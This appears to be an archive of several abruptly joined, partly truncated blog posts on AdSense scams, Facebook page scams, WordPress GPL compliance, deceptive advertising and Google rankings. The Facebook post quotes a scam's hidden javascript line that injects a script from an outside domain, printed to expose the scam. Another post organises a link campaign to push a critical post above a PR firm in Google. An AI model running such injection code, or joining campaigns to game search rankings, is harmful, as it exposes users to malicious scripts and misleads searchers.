It has to be tough policing a program like AdSense. It must be exceptionally difficult during the holiday season, when the payoff to running scams grows so much more. It is so tough, in fact, that this year as the holiday shopping season grows near, with Black Friday just a few short days away, that apparently Google has finally decided to say “fuck it”, make it easier on themselves, just remove the ability for anyone to report any violations of the program whatsoever, and allow the scammers to have a field day in the mean time.

While Google may want to give the impression to their stockholders and the public that they have both the search engine spam and advertising program cheaters fully under control, the truth is that they rely quite a bit on reports from the community and consumers for both spam and AdSense violations. For any spam that they find, Google asks people to submit a Google spam report. At this point they require that someone log in before actually filing the report itself. This makes sense, since it helps prevent people erroneously filing large amount of spam reports against their competitors. For the AdSense violations they supply a separate form that does not require a log in, titled simply Reporting a Violation – AdSense Help. Usually I don’t run into offending sites with AdSense on them that fill me with enough of a sense of civic duty where I feel compelled to actually fill out a report, but I happened to land on one such today that actually tricked me into clicking on an ad in such a way that it really did annoy me. The page I landed on was BigSiteofAmazingFacts How Much Does The Earth Weigh (yes, I was distracted by trivial shit again, don’t judge me), and in the right sidebar there was what appeared to be an embedded Youtube Video from Family Guy:

Still distracted (of course) I clicked Play on the video, only instead of playing it suddenly brought me to a site trying to sell me bras. So, thinking I must have missed the rather large video in the sidebar when I tried to click on it, I hit the back button… and noticed that suddenly the video was gone altogether, and where before I had seen 2 AdSense blocks and a video, now there were 3 AdSense blocks instead:

I hit refresh a few times but the video didn’t return. At that point I realized that it was actually a scam, so I cleared my cookies for that domain, hit refresh again, and viola, the “video” reappeared once again. At this point I was sufficiently irked that I actually decided I was going to report this asshole. It’s bad enough that a site with crap content like this is ranking #1 (the weight of the Earth is increasing each year from salt from the ocean spray? Seriously, wtf?), while people with content that is just fine are getting penalized supposedly from the Panda fallout. To add in that the guy who owns the site is ripping off advertisers as well just makes it so much worse. So, I headed on over to the AdSense Violation report to be a good citizen… and I was greeted by this:

An essentially blank page, with only a header, navigation, and a box asking me to tell AdSense how they can improve. Go figure.

From a financial perspective it does make sense for Google to make reporting AdSense violators more difficult, especially during the holidays. People who run scams like this actually generate Google money through the AdSense program, a program which currently has absolutely no oversight. It is exactly this lack of oversight that means that Google is the only one who knows how much, if any, of the advertising dollars are credited back to the advertisers once these scams are revealed. Hiding the violations report means that much fewer sites will be reported, more scams will be able to run for longer periods of time, and more money will wind up in Google’s pockets.

Is this profit motive really the reason that the report form is missing? If you ask Google I am sure they would say “of course not, we’re Google, you can trust us”. And since everything with Google is proprietary “behind closed doors” trade secrets with them, there is no way to know exactly how many violation reports suddenly went missing that apparently no one has noticed yet. My hunch though is that with something like this, as online shopping hits the holiday rush, the lack of reports that are coming in at the moment is actually too big for them not to have noticed by now, and them not fixing it for this long must be at least in some part intentional on their end.

Update: As Jen from JenSense.com pointed out in the comments, there is another newer page available where you can actually file the report located here. However, I am not sure that makes it any better, and may in fact make it worse. I wound up on the empty page by actually going to Google and searching for [report adsense violation]. The page that Jen provided is in the list, but it is down under the blank page that I found, another unhelpful blank page, and underneath a list of discussion of other people looking for the form. This begs the question… why did Google leave an otherwise empty page behind with just enough text (ie. header and title) and all of the old link juice there to outrank the “real” form? If they redesigned the site, then why not 301 redirect the old form(s) to the new one? It’s not like they don’t know how search engines work, ya know?

“True Love means never giving up” – many a stalker were born from this one innocent sounding phrase.

The truth is much less pretty than the actual picture.

[cue elevator music]

Ok, good, you’re back. If you followed some of the aftermath in the comments, on Twitter, and on various media outlets and celebrity blogs around the web (including Gawker and Wil Wheaton), you can tell that Jenny obviously has a large amount of supporters who were less than pleased at Jose Douche Canoe Martinez. The outcry got just loud enough that Brandlink Communications actually started to play the wounded bird card:

Apparently Jose Martinez felt so victimized from the whole experience, he actually decided that he needed to delete his entire Twitter account (or, of course, it could be that he was trying to do the internet equivalent of burning the evidence of his douchiness).

Quick side note: if a PR company’s first instinct when they come under fire is to duck and run, and get defensive, as opposed to owning up, making it right, and the moving on, then odds are that same PR company would not hesitate to throw a client under the bus if they felt it was necessary for their own self preservation. Anyone who is researching this company with the possibility of hiring them should probably keep that in mind.

Either way, I guess Jenny didn’t realize quite how much support she would receive, so she wound up actually asking her followers to put away the pitch forks:

UPDATED: I love you people. Really. Thank you for always having my back and for being so supportive during this weirdness. Jose has apologized, and I’ve been assured by the woman in charge of the company that they are aware and are handling it the best way they know how, so let’s give them some air and let them have the chance to do that. *deep breath* – Jenny Lawson, aka TheBloggess

Ok, so, maybe Jenny is right. Maybe some of her fans did get abusive towards Jose in the process of defending her (which, btw, I did not see myself, but I am guessing not everyone was polite) and it is time for us to let cooler heads prevail. However… I also don’t think this should fall just into internet obscurity, either. People who are looking to hire this PR firm should be able to find out who it is they are dealing with, and the first line of defense when doing research on a company is, of course, Google. Currently when you do a search for [brandlink communications], someone else’s post about Brandlink and TheBloggess is #1 (as a news story though, not as a regular listing), Brandlink Communications themselves show up next (which is actually the natural #1 listing, when no news stories show), and in the natural #10 spot is Jenny herself:

(Click to enlarge)

The news piece is of course only there for a short period of time, as all news pieces should be, and the rankings Jenny’s site has currently are probably also due to what Google refers to as QDF, or Query Deserves Freshness (where a particular search might warrant different results due to topic being “hot” at the moment). However, I think that Jenny’s site should be in the top 10 when searching on that company, even after the buzz dies down… possibly even #1. Therefore, here is what I suggest, if you happen to support Jenny in this issue:

1. Write a post showing your support for Jenny about the way she was treated. Don’t attack or “bully” anyone in the post, because despite them being in the wrong here Brandlink was right, bullying people is still wrong (although calling someone a douche canoe when they actually are one is just being descriptive imo)
2. In that post, link to Jenny’s blog post about the conversation, but use the phrase [brandlink communications] as the anchor text for the actual link.
3. If you link to the post more than once, make sure that link is the first link to the post.

For those of you wondering why, it is because links are still the number one factor Google uses when determining rankings. If you want more information on it, you can Google [santorum] and do some research… just don’t click on the first link.

Do I think this is too harsh? Perhaps if they weren’t a PR company boasting W Hotels and Chase as their clients I might be more inclined to go easy on them. However, even if they weren’t big shots treating those they regard as the “little people” like shit, there is also the fact that this behavior is not new for Jose, and there is evidence of him treating people like this all the way back to early 2006. The fact that the same guy is still VP Media Director 5 1/2 years later, still behaving the same way, makes the promises from the company that is “handling it the best way they know how” somewhat hollow. So yes, with that in mind I think that a response like this is quite fitting. Vote with your links, people, as Google intended you to.

Facebook has never been known for it’s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don’t, with only a minimal amount of technical know-how required (ie. how to sign up, and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about “scareware”, or “phishing scams”, or even how to clean a virus from their machine if they get one. Sure, they’ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, everyone is on Facebook… it must be safe. The result is a gigantic community of gullible marks just waiting to be exploited or infected by scammers and hackers.

That is why a couple of years ago I wrote a post on how to prevent getting hacked on Facebook (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be sure you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.

For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the iframe hack. For those of you who don’t, or who are not familiar with html, an iframe is an element on a webpage that allows you to embed a second webpage into it. It’s very common and a perfectly normal feature of the html language. Iframes in and of themselves are not dangerous. Google AdSense , when shown on a webpage other than Google, is in an iframe. The same goes for Facebook “Like” buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that you only ever embed iframes from sites you trust. The reason this is so crucial is because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nadda. Zilch.

The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It’s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.

Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to utilize iframes into Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend’s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter in a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That’s what I saw what was going on. This is what the page looked like with normal styles turned on:

(click to enlarge)

Clicking that button then revealed these instructions:

What was not revealed, however, was the hidden <textarea> containing Javascript code that would then be fired if you did follow those instructions:

<textarea id="c">javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)</textarea>

This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it’s all downhill from there.

Of course, odds are pages like this won’t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no “This page is hacking users” option. In fact, if you look at the “Like” counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a legitimate page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.

The bottom line is that Facebook not addressing these issues and removing the ability to embed iframes borders on negligence. Currently the FTC goes after companies and organizations that do not adequately protect their user’s data:

Maybe they should start taking a look at companies that don’t adequately protect the actual users as well.

(click to view full sized)

You can click here to view the actual search.

When the tsunami hit I was a little freaked out until I heard from him that he was ok. Then the issues started to happen with the nuclear reactors and I and a few other people started to worry again. On Thursday, March 17th I saw this on Facebook:

we are being evacuated. i should be stateside by tuesday. they’ll put us to work at base schools somewhere, not sure where. don’t know if or when i’ll be back in japan. it’s possible i’ll never see the contents of my home again, and i can only bring 1 suitcase. imagine that.

Myself and everyone that knows him was so relieved, until the next day:

teachers are being told we are “essential personnel” and therefore NOT part of the voluntary evacuation. we have no idea what’s going on. but for now, i am safe and warm.

I was like, wtf? Essential to what? Why the hell would they force the teachers to stay behind? What’s more, it looks like families of military personnel have a better chance of bringing their pets than the teachers have of getting out of there:

The teachers of our military families’ children on military bases in Japan are not being allowed to evacuate with everyone else! Schools on the bases are closed, but their jobs are being threatened if they leave on their own. Meanwhile, evacuees can bring 2 pets.

From the Stars and Stripes story, “Navy posts Q&A about ongoing voluntary departure in Japan”:

“Horses, fish, birds, and rodents are not authorized transportation.” – nor, apparently, are teachers.

I don’t get it. I also don’t get why, as far as I can tell, Stars and Stripes is the only one talking about this:

No CNN, no New York Times, no Washington Post, no Huffington Post, no BBC even… no one seems to want to carry this story. Why?

My prayers go out to everyone in Japan right now, but especially to those who are being told they are not allowed to leave.

Curiosity piqued, I dug back through the tweets until I found a link to the thread Ben was referring to. It turns out that it is a bug report on the WordPress bug tracking system, opened by user “hakre”:

The wordpress software packages to download form the website contain mostly source-code.

But as it’s known, there are files and parts in these, that are binary blobs and w/o their source as specified in the terms of the GNU GPL.

According to §1, §2 and §3 of the terms of the GNU GPL v2, the wordpress project must offer full source-code in order to distribute the whole package under GPL.

In §3 it’s made more specific what sources are:

The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable.

I was looking over the wordpress homepage but I could not find any information where to obtain the according sources that are missing from the packages – either in full source packages or in it’s additional form.

Probably I’ve overlooked something, please help me obtaining such information. – hakre

What hakre was referring to was a specific section of the GNU General Public License v2.0, which is the license that WordPress is released under. The requirements of the license dictate that anyone is free to modify or redistribute the software package, as long as the license itself stays intact, and as long as whoever receives the software package either gets a copy of the source code, an offer in writing that they will make the source code available on request, or a copy of the offer to make said source code available if that is how it was originally offered. Basically either the actual source code must be supplied, or a clear concise guarantee that it can be supplied on demand, must be included with the distribution. For the bulk of WordPress this is no problem and would never be an issue. The core WordPress files are written in php, with some elements in Javascript or html. All 3 of those languages, unless encoded in some special way, run as is straight from the source code. Php and Javascript are “scripting” languages and html is not actually a programming language. If someone wants to see or edit the “source code” for any of those files all they need to do is open them in a text editor and just look at them.

However, what hakre was talking about was the 1 and only executable file* (see hakre’s comment below for clarification) that is currently distributed with WordPress, a file named swfupload.swf, which is located in the wp-includes/js/swfupload directory. It is a Flash file, is not considered editable by normal means, and it is compiled, not in source code form. The concern that hakre raises is quite valid, since without the source code being distributed along with this file it makes it impossible to distribute WordPress as GPL v2 software. This is a Very Big Deal, especially when you consider the rift that Matt Mullenweg created in the WordPress community over the whole issue of what GPL did and did not cover. Almost 2 years ago Matt asked a lawyer from the FSF to back up what Matt was saying, and in the closing paragraph of that post he made the following statement:

So as before, we will only promote and host things on WordPress.org that are 100% GPL or compatible. – Matt Mullenweg

The fact that WordPress can’t follow the license that they are claiming everyone else needs strict adherence to makes all of Matt’s previous pettiness just that much worse.

One of the WordPress contributers, Otto42, closed the ticket when he found it. In fact, he asked the question “What sources are missing?” in the same post, but marked the ticket as “invalid” without bothering to wait for an answer. The thread was then reopened by hakre again, after which Chip Bennett joins the conversation. In a nutshell, it’s a back and forth with Otto arguing that the source code for that file is not required, since WordPress authors did not write it, and since that particular executable is not GPL, and is instead released under the MIT License. The problem with his argument is that it is, of course, dead wrong. The GPL license does indeed allow you to distribute non-GPL licensed software within a GPL package, as long as a) the non-GPL license is less restrictive than the GPL (which the MIT license is), and b) the source code is included (which, again, WordPress is not doing here).

At one point Otto makes the following claim:

As for the GPL, we are under no obligation to provide anything at all. Understand that the people here wrote the code and share a joint ownership of it. The GPL places no obligation whatsoever on the actual copyright holders of the code. They can release it anyway they like. The GPL only applies to licensees of the code in question; the downstream people using and redistributing that code. – Otto42

That of course sums up a bigger core misunderstanding of the situation that makes me wonder if more WordPress contributers are under the same illusion… that the GPL only applies to what other people can do with WordPress, and doesn’t actually apply to the contributers, or to the WordPress Foundation, or to Matt Mullenweg. Maybe all of Matt’s talk of how the GPL embodies all of WordPress’s core values managed to bury the reality of why the GPL was being used for WordPress. The truth is, WordPress is licensed under the GPL v2 because they have no choice in the matter, they have to use it. WordPress, you see, is a derivative of yet another software package, b2/cafelog, which was licensed under the GPL v2 as of March 2nd, 2002.

Otto also is also under the misconception that the following statement in the license covers them:

If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code

As a developer I am rather surprised at Otto’s lack of grasp on the IF…THEN… element to that statement. If the executable is being distributed from a remote location, then offering the source at that same location counts as distribution of the source code. An example of an executable being offered from a designated place would be Microsoft distributing software that requires their mfc32.dll to run, and giving you a link to their website where that can be downloaded. WordPress does not say “To use our Flash uploader you will need to download the executable from here“… they distribute that executable with the WordPress package itself, which means, by the terms of the GPL license they are required to follow, that they must offer the source code as well.

The final argument in the bug report relies on the fact that inside one of the Javascript files that are bundled with SWFUpload there several links referenced, and if you follow one of those links and dig around you will eventually find the source code in question. Even this, however, is not actually sufficient. As Otto points out in several places during the discussion, SWFUpload is not in and of itself GPL, and are under no obligation to offer the source code. Therefore that site could disappear altogether and the source code would no longer be available. A link that is not a direct download being mentioned in a Javascript file is not even close to WordPress offering a place for people to download the source code.

Otto is right in one respect though, the flash file in question is under the MIT License. This license is short and sweet, and in it’s entirety reads:

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

That middle line in the license, “The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.”, is non-trivial. It plainly states that a copy of this license must be included with the software. It does not say that “a copy of the notice or a link to it” is required, it clearly states that the notice itself needs to be there… and this notice just happens to be missing from the copy of the software distributed with WordPress. It also happens to be missing from from the thickbox package that is found in wp-includes/js/thickbox as well. The fact that either copy of the license was missing from wherever the WordPress developer who included it in the package got it originally is no excuse for WordPress being non-compliant, either. It is Matt Mullenweg’s responsibility, as the distributor, to ensure that all of the licenses are in line.

There is no question, ever since WordPress included the SWFUpload software without it’s source code, which as near as I can determine started in version 2.5, they have been in clear violation of the very license they have been bashing other people over the head with. Fixing it now will not change the fact that they violated it for years, either. There really is no excuse for this.

Update: I just wanted to include a section in the GPL FAQ that I missed before that is strongly relevant to this discussion, “I downloaded just the binary from the net. If I distribute copies, do I have to get the source and distribute that too?”

Yes. The general rule is, if you distribute binaries, you must distribute the complete corresponding source code too. The exception for the case where you received a written offer for source code is quite limited.

Honestly, it doesn’t get any clearer than that. Mind you, that won’t stop people from trying to argue the point further, but the FSF themselves are very succinct on that point. SWFUpload is a binary that the WordPress developers downloaded from somewhere else and included in their package, the GPL requires that the source code be included. WordPress has been in violation of the GPL for a few years now at least.

Personally, I’d like to see Zedo up its standards for the type of ads it will accept. This type of junk shouldn’t be allowed. - Danny Sullivan

He’s right, too, the ad networks should be policing this type of deception, by all means. Matt Cutts, Google’s head of the web spam team, agrees. He tweeted about the story, and also commented his take on the matter in the post itself:

My favorite part of the disclaimer for those type of sites is “This website, and any page on the website, is based loosely off a true story, but has been modified in multiple ways including, but not limited to: the story, the photos, and the comments.”

Oh, so I can trust the website except for the story, photos, and comments? In other words, the entire website?

And if you read the disclaimer carefully, most of these sites promise a “free trial” with $1.95 in shipping, but actually set your card up with a recurring subscription. The “one weird old tip” ad that I clicked from the L.A. Times mentioned this in the fine print: “If you do not cancel within seven (7) days of the date that you enroll in the Program, we will charge the same card you provided at enrollment the non-refundable one-year membership fee of $149.95″. Then they also start charging you $12.95 a month. Grr. – Matt Cutts, on deceptive “flat belly” ads

Grr, indeed.

Danny also mentions in his post about how “The ad, unlike Google’s ads, doesn’t report what ad network is delivering them,” which if they did would be a form of disclosure. And Danny is right… except for one thing. Danny derived the fact that the ad was being served by Zedo by examining the url. However, if you view the source on the LA Times article and go to the spot on the page where the ad is showing, you don’t see the Zedo ad network code. The ad itself is being generated by Javascript that is being pulled from yet another ad network:

The actual ad network that the LA Times has a relationship with, and the ones responsible for what ads show on their site, is Doubleclick. And who owns Doubeclick, you might ask? As most of you probably already know, Google does, since they bought them back in 2007 for $3.1 billion. So obviously not all of the ads Google delivers disclose what network they are from.

It gets better. AdSense, Google’s flagship advertising network, serves what are known as “contextual ads”, where in theory the ad targeting is based on the context of the page contents where the ad blocks are placed. Danny uses AdSense on his site, with one of the blocks being at the very top of the page. Due to the various feeds in the sidebar, the content of the article, and the title, “Acai Berry” is mentioned 8 times on that same page. Therefore it is only natural, of course, that this is what we see when we look at the ads being served on the top:

(click to enlarge)

Now, can you guess where that ad leads? That’s right:

(click to enlarge)

It’s a fake news site identical to the one Danny is discussing, with the same text, layout, and even images embedded in the “story”, with the only variation being that the one Danny landed on is “News 7″, and this one is “News 8″.

What makes this story particularly interesting is that recently Matt Cutts visited Washington D.C., lobbying the FTC about Google’s integrity, trying to convince them that they don’t require government oversight, and how they could be trusted to police themselves. Google also happens to be in a very unique position to help clean up these kinds of abuses. Not only could they pull these ads from their own vast array of properties, and require their third party partners to do the same, but they could also warn publishers who use networks that continue to promote scams that their sites rankings could suffer, in the same way that they have punished websites in the past for what they said was deceptive marketing, in the form of undisclosed paid links. Instead, they themselves appear to be participating in the problem, not the solution.

So, Matt, are you willing to back up your testimony to the FTC about Google’s integrity, and lobby within your own company to help eradicate deceptive marketing from the web? Do you feel that websites that allow deceptive advertising to be shown on their sites should have their trust revoked?

Does this mean that Google really hates torrent sites? Well, not all of them, apparently. The Pirate Bay, world’s largest bittorrent tracker, is still receiving much love from Google:

(click to enlarge)

How long will this listing last is anyone’s guess, but it is interesting in light of the fact that it is the most notorious of all the torrent sites out there. Kind of odd that this would be the one that they missed in their censorship sweep.